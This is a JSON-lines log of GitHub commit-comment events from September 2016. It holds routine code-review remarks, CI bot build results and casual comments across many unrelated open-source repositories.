{"id":"4584662357","type":"CommitCommentEvent","actor":{"login":"wooorm"},"repo":{"name":"CMDA/Frontend-3"},"payload":{"comment":{"id":19082037,"position":null,"line":null,"path":null,"commit_id":"97742c46dea86ec85035c2f513160f33191e2602","created_at":"2016-09-19T17:22:46Z","updated_at":"2016-09-19T17:22:46Z","body":"@Razpudding What are you trying to do here?"}},"created_at":"2016-09-19T17:22:46Z"}
{"id":"4584664772","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19082041,"position":12,"line":12,"path":"src/BenchmarkDotNet.Core/Characteristics/CharacteristicHelper.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T17:23:08Z","updated_at":"2016-09-19T17:23:08Z","body":"> new[] { IdSeparator },\r\n\r\nthis array should be cached to avoid allocations"}},"created_at":"2016-09-19T17:23:08Z"}
{"id":"4584666346","type":"CommitCommentEvent","actor":{"login":"holmesie"},"repo":{"name":"projecttacoma/bonnie"},"payload":{"comment":{"id":19082043,"position":null,"line":null,"path":null,"commit_id":"ff21c5e6b5edefab0741c0e4ee439012943adb72","created_at":"2016-09-19T17:23:22Z","updated_at":"2016-09-19T17:23:22Z","body":"Looks great!"}},"created_at":"2016-09-19T17:23:22Z"}
{"id":"4584670894","type":"CommitCommentEvent","actor":{"login":"guyharris"},"repo":{"name":"the-tcpdump-group/libpcap"},"payload":{"comment":{"id":19082049,"position":10,"line":1031,"path":"pcap-common.c","commit_id":"21ab5f1175655f1bb523764c7d70bc94c1e651b1","created_at":"2016-09-19T17:24:04Z","updated_at":"2016-09-19T17:24:04Z","body":"Fixed in 53b5b9cb8350679b5b04eb24cbeaf80b756b8289."}},"created_at":"2016-09-19T17:24:04Z"}
{"id":"4584673092","type":"CommitCommentEvent","actor":{"login":"leticiaquino"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19082052,"position":35,"line":51,"path":"docs/source/tagset/elemento-ref-list.rst","commit_id":"19b4b24032d1ae90fee718c29b5df7790af8eee6","created_at":"2016-09-19T17:24:24Z","updated_at":"2016-09-19T17:24:24Z","body":"Hmm, você diz isso no sentido de pedirmos que os títulos \"Referências Bibliográficas\" sejam identificados obrigatoriamente como ```<label>```em vez de ```<title>```, para que possamos suportar os dois elementos:\r\n```<label>``` e  ```<title>``` ?"}},"created_at":"2016-09-19T17:24:24Z"}
{"id":"4584675101","type":"CommitCommentEvent","actor":{"login":"MacGyverr"},"repo":{"name":"MacGyverr/skin.metropolis"},"payload":{"comment":{"id":19082057,"position":null,"line":null,"path":null,"commit_id":"66dcd3c49bd5a7a6d5dd21b0f3f99c7fe10e8dcf","created_at":"2016-09-19T17:24:43Z","updated_at":"2016-09-19T17:24:43Z","body":"![screenshot003](https://cloud.githubusercontent.com/assets/6500800/18641860/42b0ca56-7e53-11e6-83c6-f114ff6152ef.jpg)\r\n"}},"created_at":"2016-09-19T17:24:43Z"}
{"id":"4584675789","type":"CommitCommentEvent","actor":{"login":"jb3-2"},"repo":{"name":"StataBS/indikatoren"},"payload":{"comment":{"id":19082058,"position":null,"line":null,"path":null,"commit_id":"2dc50480528c35283f2dbffbbd76818faef32f89","created_at":"2016-09-19T17:24:50Z","updated_at":"2016-09-19T17:24:50Z","body":"Das Schema im File data/I.01.1.0019.csv ist total verändert (siehe 2dc50480528c35283f2dbffbbd76818faef32f89). Bist Du sicher, dass das so sein muss?"}},"created_at":"2016-09-19T17:24:50Z"}
{"id":"4584676452","type":"CommitCommentEvent","actor":{"login":"ddugovic"},"repo":{"name":"ornicar/scalachess"},"payload":{"comment":{"id":19082060,"position":null,"line":null,"path":null,"commit_id":"b2936238ccd080622bcc06fc5f95f9f93194b959","created_at":"2016-09-19T17:24:56Z","updated_at":"2016-09-19T17:24:56Z","body":"Also, unless playing crazyhouse, 3fold can only occur from the last `halfMoveClock` plies.  Pawn moves and captures are irreversible."}},"created_at":"2016-09-19T17:24:56Z"}
{"id":"4584677648","type":"CommitCommentEvent","actor":{"login":"michael-golfi"},"repo":{"name":"michael-golfi/rules"},"payload":{"comment":{"id":19082061,"position":null,"line":null,"path":null,"commit_id":"2b4b044ffc2769e7a3695ebc5c18ac719d11ca37","created_at":"2016-09-19T17:25:08Z","updated_at":"2016-09-19T17:25:08Z","body":"I have an issue with the test im working on currently... It seems like the\norder is being observed in my test case and the algorithm isn't preserving\norder.\n\nOn Sep 19, 2016 1:22 PM, \"Aleksi Sapon\" <notifications@github.com> wrote:\n\n> Are you actually comparing the test results to data or just printing out\n> the result for manual verification? Because that's not really testing...\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/michael-golfi/rules/commit/2b4b044ffc2769e7a3695ebc5c18ac719d11ca37#commitcomment-19082034>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABUv1DUslpK63DBcnJdvDsET4-gfvs5yks5qrsTcgaJpZM4KAveS>\n> .\n>\n"}},"created_at":"2016-09-19T17:25:08Z"}
{"id":"4584688060","type":"CommitCommentEvent","actor":{"login":"EmilyK"},"repo":{"name":"shaunvadaketh/blogful"},"payload":{"comment":{"id":19082077,"position":10,"line":78,"path":"blog/views.py","commit_id":"ca61a4b6ebc43bd4251472b72b4c85a95c77a221","created_at":"2016-09-19T17:26:41Z","updated_at":"2016-09-19T17:26:41Z","body":"@shaunvadaketh the entry gets deleted by loading this url in the browser, meaning you won't be able to view the `delete_entry.html` template. I suggest that you implement two views, one that renders the `delete_entry.html` template, and another that does the actual deleting and redirects back to the entries page."}},"created_at":"2016-09-19T17:26:41Z"}
{"id":"4584689274","type":"CommitCommentEvent","actor":{"login":"osstony"},"repo":{"name":"20tab/UnrealEnginePython"},"payload":{"comment":{"id":19082079,"position":23,"line":502,"path":"Source/UnrealEnginePython/Private/UEPyEngine.cpp","commit_id":"f94fada520a98320eefbe59be24f5367ec81888c","created_at":"2016-09-19T17:26:51Z","updated_at":"2016-09-19T17:26:51Z","body":"@rdeioris could you explain how using \"PyFakeCallable\" works in this situation?"}},"created_at":"2016-09-19T17:26:51Z"}
{"id":"4584691772","type":"CommitCommentEvent","actor":{"login":"MacGyverr"},"repo":{"name":"MacGyverr/skin.metropolis"},"payload":{"comment":{"id":19082086,"position":null,"line":null,"path":null,"commit_id":"66dcd3c49bd5a7a6d5dd21b0f3f99c7fe10e8dcf","created_at":"2016-09-19T17:27:14Z","updated_at":"2016-09-19T17:27:14Z","body":"Will let you know if a movie is in a set, pressing to the right will allow you to select the icon and clicking on it will open the set."}},"created_at":"2016-09-19T17:27:14Z"}
{"id":"4584691783","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19082087,"position":null,"line":null,"path":null,"commit_id":"2df7f4d5b3b4052b42b6a64d4f994190b9081d8e","created_at":"2016-09-19T17:27:14Z","updated_at":"2016-09-19T17:27:14Z","body":"ASIHPValidation (mjwitte) - x86_64-MacOS-10.9-clang: OK (2324 of 2332 tests passed, 3 test warnings)\n\n * 11 tests had: AUD diffs.\n * 11 tests had: ERR diffs.\n * 8 tests had: Table big diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ESO small diffs.\n * 1 test had: MDD diffs.\n * 1 test had: MTD diffs.\n * 1 test had: RDD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2df7f4d5b3b4052b42b6a64d4f994190b9081d8e-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2df7f4d5b3b4052b42b6a64d4f994190b9081d8e-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.66%25-yellow.svg)</a> \n"}},"created_at":"2016-09-19T17:27:14Z"}
{"id":"4584692295","type":"CommitCommentEvent","actor":{"login":"sporkmonger"},"repo":{"name":"go-ldap/ldap"},"payload":{"comment":{"id":19082090,"position":196,"line":196,"path":"example_test.go","commit_id":"e6cf29f660d821b39fbac571716c4dbcc1664a7a","created_at":"2016-09-19T17:27:19Z","updated_at":"2016-09-19T17:27:19Z","body":"Wouldn't the username be user-controlled input in this scenario?"}},"created_at":"2016-09-19T17:27:19Z"}
{"id":"4584693314","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"felixonmars/EnergyPlus"},"payload":{"comment":{"id":19082092,"position":null,"line":null,"path":null,"commit_id":"bfaf45db4e0cffc4d85384499dc19286faf82e15","created_at":"2016-09-19T17:27:27Z","updated_at":"2016-09-19T17:27:27Z","body":"patch-1 (felixonmars) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2372 of 2372 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-19T17:27:27Z"}
{"id":"4584695139","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19082096,"position":36,"line":36,"path":"src/BenchmarkDotNet.Core/Characteristics/CharacteristicSet.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T17:27:44Z","updated_at":"2016-09-19T17:27:44Z","body":">  public ICharacteristic[] GetValues() => characteristics.Values.ToArray();\r\n\r\ndo we need this as array? maybe IEnumerable would be enough (without .ToArray())?"}},"created_at":"2016-09-19T17:27:44Z"}
{"id":"4584703931","type":"CommitCommentEvent","actor":{"login":"jonathanong"},"repo":{"name":"koajs/csrf"},"payload":{"comment":{"id":19082108,"position":null,"line":null,"path":null,"commit_id":"9118bb43ca4d2ae3810dc9d117f4a2ff2aa5debe","created_at":"2016-09-19T17:29:04Z","updated_at":"2016-09-19T17:29:04Z","body":"update the history.md? haha"}},"created_at":"2016-09-19T17:29:04Z"}
{"id":"4584705971","type":"CommitCommentEvent","actor":{"login":"DPerezN"},"repo":{"name":"DPerezN/Inndex"},"payload":{"comment":{"id":19082111,"position":null,"line":null,"path":null,"commit_id":"7f1b756ec41982ad20691672c4a8ec9740999edf","created_at":"2016-09-19T17:29:22Z","updated_at":"2016-09-19T17:29:22Z","body":"fhggffhg"}},"created_at":"2016-09-19T17:29:22Z"}
{"id":"4584712610","type":"CommitCommentEvent","actor":{"login":"jamierocks"},"repo":{"name":"FabricMC/pomf"},"payload":{"comment":{"id":19082126,"position":1,"line":1,"path":"mappings/net/miencraft/client/server/CommandManagerIntegratedServer.mapping","commit_id":"bbbd3cff798208077cfcae874583bc34445e4816","created_at":"2016-09-19T17:30:27Z","updated_at":"2016-09-19T17:30:27Z","body":"miencraft :P"}},"created_at":"2016-09-19T17:30:27Z"}
{"id":"4584714387","type":"CommitCommentEvent","actor":{"login":"blomquisg"},"repo":{"name":"matobet/manageiq"},"payload":{"comment":{"id":19082130,"position":7,"line":7,"path":"app/models/manageiq/providers/redhat/infra_manager/vm_import.rb","commit_id":"1429b90a950cf7bb8abd961bd0cc8ff6e8c1ed81","created_at":"2016-09-19T17:30:44Z","updated_at":"2016-09-19T17:30:44Z","body":"I would make the `source_provider_id` an actual parameter of the method and not hide it in the `params`.  It would make it clearer that your are importing the VM from another provider, and not importing one, from for instance just a properties hash of some sort."}},"created_at":"2016-09-19T17:30:44Z"}
{"id":"4584716055","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"felixonmars/EnergyPlus"},"payload":{"comment":{"id":19082134,"position":null,"line":null,"path":null,"commit_id":"bfaf45db4e0cffc4d85384499dc19286faf82e15","created_at":"2016-09-19T17:30:59Z","updated_at":"2016-09-19T17:30:59Z","body":"patch-1 (felixonmars) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-bfaf45db4e0cffc4d85384499dc19286faf82e15-PR5865-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-19T17:30:59Z"}
{"id":"4584722766","type":"CommitCommentEvent","actor":{"login":"masterkwei"},"repo":{"name":"githubteacher/sep-19-developers"},"payload":{"comment":{"id":19082147,"position":null,"line":null,"path":null,"commit_id":"9496c653ffc1ee82c55a022fdf309051937e527c","created_at":"2016-09-19T17:32:03Z","updated_at":"2016-09-19T17:32:03Z","body":"Which beach is your favorite?"}},"created_at":"2016-09-19T17:32:03Z"}
{"id":"4584722931","type":"CommitCommentEvent","actor":{"login":"darkhax"},"repo":{"name":"MinecraftForge/MinecraftForge"},"payload":{"comment":{"id":19082150,"position":40,"line":71,"path":"src/main/java/net/minecraftforge/fml/common/eventhandler/ASMEventHandler.java","commit_id":"1107088acb809004a0865fca24b1aaea63fbb7cc","created_at":"2016-09-19T17:32:05Z","updated_at":"2016-09-19T17:32:05Z","body":"Not sure if this was left in intentionally or not. "}},"created_at":"2016-09-19T17:32:05Z"}
{"id":"4584724033","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19082154,"position":null,"line":null,"path":null,"commit_id":"b117256751986be592b4498c8fd48230787fc579","created_at":"2016-09-19T17:32:14Z","updated_at":"2016-09-19T17:32:14Z","body":"This should probably be done in evaluate_passed_pawn, but for this first try I would like to check how it fares within evaluate_pieces."}},"created_at":"2016-09-19T17:32:14Z"}
{"id":"4584728783","type":"CommitCommentEvent","actor":{"login":"tehandyb"},"repo":{"name":"mbostock/topojson"},"payload":{"comment":{"id":19082175,"position":null,"line":null,"path":null,"commit_id":"6770d3c7d41594d17865b3bebfed3a9d2b09e0e8","created_at":"2016-09-19T17:32:56Z","updated_at":"2016-09-19T17:32:56Z","body":"It would be nice if this were in the docs somewhere on how to import, I also got snagged on this!"}},"created_at":"2016-09-19T17:32:56Z"}
{"id":"4584735109","type":"CommitCommentEvent","actor":{"login":"gustavofonseca"},"repo":{"name":"scieloorg/scielo_publishing_schema"},"payload":{"comment":{"id":19082187,"position":35,"line":51,"path":"docs/source/tagset/elemento-ref-list.rst","commit_id":"19b4b24032d1ae90fee718c29b5df7790af8eee6","created_at":"2016-09-19T17:33:54Z","updated_at":"2016-09-19T17:33:54Z","body":"sim"}},"created_at":"2016-09-19T17:33:54Z"}
{"id":"4584740029","type":"CommitCommentEvent","actor":{"login":"madisongh"},"repo":{"name":"madisongh/meta-tegra"},"payload":{"comment":{"id":19082196,"position":null,"line":null,"path":null,"commit_id":"a50de0d1f8d31796a991c76713c00201d5d08b02","created_at":"2016-09-19T17:34:40Z","updated_at":"2016-09-19T17:34:40Z","body":"I was fixing builds with opengl and without x11, which should work now.  I should have gone one step further, and handled non-opengl builds as well.  I'll see if I can resolve that quickly.  Thanks."}},"created_at":"2016-09-19T17:34:40Z"}
{"id":"4584741939","type":"CommitCommentEvent","actor":{"login":"rdeioris"},"repo":{"name":"20tab/UnrealEnginePython"},"payload":{"comment":{"id":19082198,"position":23,"line":502,"path":"Source/UnrealEnginePython/Private/UEPyEngine.cpp","commit_id":"f94fada520a98320eefbe59be24f5367ec81888c","created_at":"2016-09-19T17:34:57Z","updated_at":"2016-09-19T17:34:57Z","body":"In https://github.com/20tab/UnrealEnginePython/blob/master/Source/UnrealEnginePython/Public/PythonDelegate.h PyFakeCallable is marked with 'UFUNCTION()'. This allows the py_delegate object to get access to the PyFakeCallable UFunction. "}},"created_at":"2016-09-19T17:34:57Z"}
{"id":"4584745504","type":"CommitCommentEvent","actor":{"login":"hadret"},"repo":{"name":"jsonn/pkgsrc"},"payload":{"comment":{"id":19082207,"position":5,"line":3,"path":"sysutils/salt/Makefile","commit_id":"6809496b9713b6541bbaa3a455ca434d799ad82a","created_at":"2016-09-19T17:35:31Z","updated_at":"2016-09-19T17:35:31Z","body":"I think this is a mistake (my most likely) -- 2016.3.4 has not yet been released and rest of the files is mentioning 2016.3.3."}},"created_at":"2016-09-19T17:35:31Z"}
{"id":"4584746792","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19082209,"position":null,"line":null,"path":null,"commit_id":"5bec328f2edfb9c36bfe2fbf28b433b7b92c8463","created_at":"2016-09-19T17:35:43Z","updated_at":"2016-09-19T17:35:43Z","body":"Thats a bad idea. I would be surprised if you can solve the problem with out replacing abstract packet with a managed class and you won't be able to do that if you already have a compiled library. There is no reason you need a c file. Just make it cpp and extern c"}},"created_at":"2016-09-19T17:35:43Z"}
{"id":"4584748169","type":"CommitCommentEvent","actor":{"login":"hamsar"},"repo":{"name":"blockchain/api-v1-client-csharp"},"payload":{"comment":{"id":19082214,"position":15,"line":44,"path":"README.md","commit_id":"0fc9a41b8e3572c38a1b890e29b008e61800c89a","created_at":"2016-09-19T17:35:55Z","updated_at":"2016-09-19T17:35:55Z","body":"SIR API IN .NET "}},"created_at":"2016-09-19T17:35:55Z"}
{"id":"4584753627","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19082236,"position":null,"line":null,"path":null,"commit_id":"fa4d61cdd0a6ab31952d733460fe924e79891157","created_at":"2016-09-19T17:36:48Z","updated_at":"2016-09-19T17:36:48Z","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (1763 of 1763 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-fa4d61cdd0a6ab31952d733460fe924e79891157-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-19T17:36:48Z"}
{"id":"4584755785","type":"CommitCommentEvent","actor":{"login":"Balintskac"},"repo":{"name":"LunaWorks/Orcs-Web"},"payload":{"comment":{"id":19082239,"position":null,"line":null,"path":null,"commit_id":"a5416dbc3da9919740cafdaa6f277197eed45d55","created_at":"2016-09-19T17:37:09Z","updated_at":"2016-09-19T17:37:09Z","body":"https://gist.github.com/Balintskac/c5f23be5ce3596db46652c2f0b666ead \r\nThis link brings you to the characters.js file, sadly , i could not commit ths file beacuse of its own type, it is not supported here.\r\n\r\n"}},"created_at":"2016-09-19T17:37:09Z"}
{"id":"4584762542","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19082257,"position":107,"line":100,"path":"src/BenchmarkDotNet.Core/Code/CodeGenerator.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T17:38:14Z","updated_at":"2016-09-19T17:38:14Z","body":"> builder.ToString()\r\n\r\nto avoid this allocation we could store the initial value and use it to determine whether given string is present or not"}},"created_at":"2016-09-19T17:38:14Z"}
{"id":"4584762805","type":"CommitCommentEvent","actor":{"login":"okitec"},"repo":{"name":"okitec/teutoburg"},"payload":{"comment":{"id":19082258,"position":null,"line":null,"path":null,"commit_id":"e9645d8fba459920becca5b9092a6978cba36fe8","created_at":"2016-09-19T17:38:17Z","updated_at":"2016-09-19T17:38:17Z","body":"@drt2016 Markomannen, nicht Makromannen; Arminius, nicht Armenius, ... I hope you like it!"}},"created_at":"2016-09-19T17:38:17Z"}
{"id":"4584764699","type":"CommitCommentEvent","actor":{"login":"jbleich89"},"repo":{"name":"zodiacmetrics/python-client"},"payload":{"comment":{"id":19082262,"position":null,"line":null,"path":null,"commit_id":"c15f80e71b89b3fbba24df6fb2e7f8b992bd3151","created_at":"2016-09-19T17:38:36Z","updated_at":"2016-09-19T17:38:36Z","body":"how was the download client updated?"}},"created_at":"2016-09-19T17:38:36Z"}
{"id":"4584774936","type":"CommitCommentEvent","actor":{"login":"Jarlaxe227"},"repo":{"name":"Jarlaxe227/BuggySoft"},"payload":{"comment":{"id":19082276,"position":null,"line":null,"path":null,"commit_id":"571385962a88da52a5a6baf6c53352f6ad3f2985","created_at":"2016-09-19T17:40:24Z","updated_at":"2016-09-19T17:40:24Z","body":"Granted, I kind of left this project aside to be focused on school work and those projects. As it turns out a project I worked on in my second semester for a 2-course split project between Data Structures and Object Oriented Programming is similar to how this could turn out. Later, I will put in on GitHub as for now, my partner and I are working on another project and we mainly use Bitbucket as a means of source control so that our school work can not be used and get reported as academic dishonesty."}},"created_at":"2016-09-19T17:40:24Z"}
{"id":"4584776226","type":"CommitCommentEvent","actor":{"login":"adamsitnik"},"repo":{"name":"PerfDotNet/BenchmarkDotNet"},"payload":{"comment":{"id":19082278,"position":44,"line":57,"path":"src/BenchmarkDotNet.Core/Columns/BaselineScaledColumn.cs","commit_id":"972fee7401c1d460342f5afed07b802513d47445","created_at":"2016-09-19T17:40:38Z","updated_at":"2016-09-19T17:40:38Z","body":"can the result of `ResultStatistics.Invert()` be null if `ResultStatistics` is not null?"}},"created_at":"2016-09-19T17:40:38Z"}
{"id":"4584782182","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"ElbertoOne/Stockfish"},"payload":{"comment":{"id":19082292,"position":null,"line":null,"path":null,"commit_id":"b117256751986be592b4498c8fd48230787fc579","created_at":"2016-09-19T17:41:42Z","updated_at":"2016-09-19T17:41:42Z","body":"Calling  !pos.attackers_to(s) is not economical and not necessary. \r\nIf rook has to move, than next move will get a better evaluation.\r\n\r\nforward_bb(Us, s) & ei.pi->passed_pawn(Us) should be enough of a condition here.\r\n\r\nAlso, in evaluate_passed_pawn, we already give a bonus when a rook or queen are behind the pawn,\r\n`Bitboard bb = forward_bb(Them, s) & pos.pieces(ROOK, QUEEN) & pos.attacks_from<ROOK>(s);`\r\nWhen it is the case, the defended bitboard is same as squaresToQueen, and the pawn gets a good bonus.\r\n"}},"created_at":"2016-09-19T17:41:42Z"}
{"id":"4584784141","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":19082297,"position":14,"line":152,"path":"helpers/XMLPSWrapper.inc.php","commit_id":"ccac7d6439daf89330a7572b2e7c09f560566f05","created_at":"2016-09-19T17:42:03Z","updated_at":"2016-09-19T17:42:03Z","body":"Watch out for space-based indents :)"}},"created_at":"2016-09-19T17:42:03Z"}
{"id":"4584787254","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":19082301,"position":11,"line":150,"path":"helpers/XMLPSWrapper.inc.php","commit_id":"ccac7d6439daf89330a7572b2e7c09f560566f05","created_at":"2016-09-19T17:42:32Z","updated_at":"2016-09-19T17:42:32Z","body":"We're not currently defining types in method headers -- just in the self-documentation. Remove `array` here, and add the type to the `@param` declaration above."}},"created_at":"2016-09-19T17:42:32Z"}
{"id":"4584788577","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":19082303,"position":7,"line":226,"path":"MarkupGatewayPlugin.inc.php","commit_id":"ccac7d6439daf89330a7572b2e7c09f560566f05","created_at":"2016-09-19T17:42:46Z","updated_at":"2016-09-19T17:42:46Z","body":"Type should be `Journal`, not `mixed`"}},"created_at":"2016-09-19T17:42:46Z"}
{"id":"4584789492","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":19082306,"position":8,"line":227,"path":"MarkupGatewayPlugin.inc.php","commit_id":"ccac7d6439daf89330a7572b2e7c09f560566f05","created_at":"2016-09-19T17:42:55Z","updated_at":"2016-09-19T17:42:55Z","body":"Likewise, type should be `Submission`, not `mixed`"}},"created_at":"2016-09-19T17:42:55Z"}
{"id":"4584794656","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":19082321,"position":18,"line":237,"path":"MarkupGatewayPlugin.inc.php","commit_id":"ccac7d6439daf89330a7572b2e7c09f560566f05","created_at":"2016-09-19T17:43:43Z","updated_at":"2016-09-19T17:43:43Z","body":"Using `[ ]` is PHP5.4+ only; for now, use `array( )`."}},"created_at":"2016-09-19T17:43:43Z"}
{"id":"4584795687","type":"CommitCommentEvent","actor":{"login":"mtorromeo"},"repo":{"name":"vuejs/vue-migration-helper"},"payload":{"comment":{"id":19082325,"position":12,"line":17,"path":"helpers/check-for-deprecations.js","commit_id":"0a95b214c367dfd1395a7ced494d982f74cac625","created_at":"2016-09-19T17:43:53Z","updated_at":"2016-09-19T17:43:53Z","body":"This wrapper function has no purpose. You could simplify this to a straight `.map(require)`."}},"created_at":"2016-09-19T17:43:53Z"}
{"id":"4584796151","type":"CommitCommentEvent","actor":{"login":"kamaal44"},"repo":{"name":"kamaal44/my-document"},"payload":{"comment":{"id":19082329,"position":20,"line":20,"path":".gitignore","commit_id":"80123e25171f14374a843d4a74af66568057059c","created_at":"2016-09-19T17:43:58Z","updated_at":"2016-09-19T17:43:58Z","body":"Php.log"}},"created_at":"2016-09-19T17:43:58Z"}
{"id":"4584796747","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19082331,"position":null,"line":null,"path":null,"commit_id":"6821ffa0254b88de62dd76c7c120813521eb3e3d","created_at":"2016-09-19T17:44:04Z","updated_at":"2016-09-19T17:44:04Z","body":"![cleanup](https://cloud.githubusercontent.com/assets/163977/18642566/5ca16096-7e5e-11e6-9c9c-53aee57fa45d.jpg)\r\n"}},"created_at":"2016-09-19T17:44:04Z"}
{"id":"4584797708","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":19082334,"position":40,"line":276,"path":"MarkupGatewayPlugin.inc.php","commit_id":"ccac7d6439daf89330a7572b2e7c09f560566f05","created_at":"2016-09-19T17:44:14Z","updated_at":"2016-09-19T17:44:14Z","body":"Mixed spaces and tabs :)"}},"created_at":"2016-09-19T17:44:14Z"}
{"id":"4584800699","type":"CommitCommentEvent","actor":{"login":"asmecher"},"repo":{"name":"kaschioudi/ojs3-markup"},"payload":{"comment":{"id":19082342,"position":null,"line":null,"path":null,"commit_id":"ccac7d6439daf89330a7572b2e7c09f560566f05","created_at":"2016-09-19T17:44:44Z","updated_at":"2016-09-19T17:44:44Z","body":"Just a few comments -- otherwise looks good, thanks!"}},"created_at":"2016-09-19T17:44:44Z"}
{"id":"4584802953","type":"CommitCommentEvent","actor":{"login":"crazyniche1"},"repo":{"name":"crazyniche1/GithubDemo"},"payload":{"comment":{"id":19082347,"position":null,"line":null,"path":null,"commit_id":"88660ba4aeae00b43a58e055fe79373dba38dfad","created_at":"2016-09-19T17:45:07Z","updated_at":"2016-09-19T17:45:07Z","body":"what is  this   ？"}},"created_at":"2016-09-19T17:45:07Z"}
{"id":"4584803694","type":"CommitCommentEvent","actor":{"login":"vtjnash"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19082350,"position":null,"line":null,"path":null,"commit_id":"0408085d74158e00515ec539143eee3c47365ce2","created_at":"2016-09-19T17:45:14Z","updated_at":"2016-09-19T17:45:14Z","body":"@nanosoldier `runbenchmarks(ALL, vs = \"dab390ccd2e8d57e7450d72b1c51286530340ae7\")`"}},"created_at":"2016-09-19T17:45:14Z"}
{"id":"4584809550","type":"CommitCommentEvent","actor":{"login":"skreutzberger"},"repo":{"name":"SwiftyBeaver/SBObjectiveCWrapper"},"payload":{"comment":{"id":19082363,"position":null,"line":null,"path":null,"commit_id":"dca8ee4f6bc2ea2417db97113472e2ad7a7bce4b","created_at":"2016-09-19T17:46:13Z","updated_at":"2016-09-19T17:46:13Z","body":"woohoo, thanks @reesemclean !"}},"created_at":"2016-09-19T17:46:13Z"}
{"id":"4584811162","type":"CommitCommentEvent","actor":{"login":"CristianBallenGamboa"},"repo":{"name":"Unifsena/Unifsena"},"payload":{"comment":{"id":19082367,"position":null,"line":null,"path":null,"commit_id":"faf5fb92ab7c96de0d1b89b3cae3203b744730f6","created_at":"2016-09-19T17:46:30Z","updated_at":"2016-09-19T17:46:30Z","body":"Logo de unifsea\r\n![ffff](https://cloud.githubusercontent.com/assets/21691880/18642645/13965d62-7e67-11e6-9c31-18cd938c1928.JPG)\r\n"}},"created_at":"2016-09-19T17:46:30Z"}
